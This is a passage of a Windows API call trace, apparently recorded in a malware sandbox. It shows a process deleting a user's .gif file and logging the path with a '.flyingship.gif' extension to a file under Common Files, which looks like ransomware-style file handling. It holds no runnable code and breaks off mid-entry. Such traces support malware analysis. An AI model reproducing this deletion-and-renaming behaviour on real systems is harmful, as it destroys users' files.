LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.537] FreeLibrary (hLibModule=0x75990000) returned 1 [0189.537] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.537] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0189.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", lpFilePart=0x0) returned 0x54 [0189.537] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b16250, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0xb6ccdc90, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0x16335640, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x77e4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Lu YE0Otm8F.gif", cAlternateFileName="LUYE0O~1.GIF")) returned 0x90ae18 [0189.537] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\lu ye0otm8f.gif")) returned 1 [0189.540] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b16250, ftCreationTime.dwHighDateTime=0x1d5dbf8, ftLastAccessTime.dwLowDateTime=0xb6ccdc90, ftLastAccessTime.dwHighDateTime=0x1d5e322, ftLastWriteTime.dwLowDateTime=0x16335640, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x77e4, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Lu YE0Otm8F.gif", cAlternateFileName="LUYE0O~1.GIF")) returned 0 [0189.540] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0189.544] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0189.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0189.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0189.544] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0189.545] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.545] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0189.545] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.545] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0189.545] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.545] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.545] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0189.545] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2ccc, lpOverlapped=0x0) returned 1 [0189.546] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0189.546] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2ccc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.546] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0189.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0189.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.flyingship.gif\r\n", cchWideChar=98, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0189.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x62) returned 0x8e8320 [0189.546] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.flyingship.gif\r\n", cchWideChar=98, lpMultiByteStr=0x8e8320, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 98 [0189.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0189.546] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0189.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0189.546] WriteFile (in: hFile=0x160, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x61, lpOverlapped=0x0) returned 1 [0189.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0189.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.547] CloseHandle (hObject=0x160) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0189.548] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0189.548] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0189.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0189.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0189.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.550] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0189.550] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.550] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.550] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0189.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0189.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0189.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0189.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0189.551] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0189.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0189.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0189.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0189.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0189.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0189.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.553] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0189.553] RtlAllocateHeap (HeapHandle=0x8a0000, 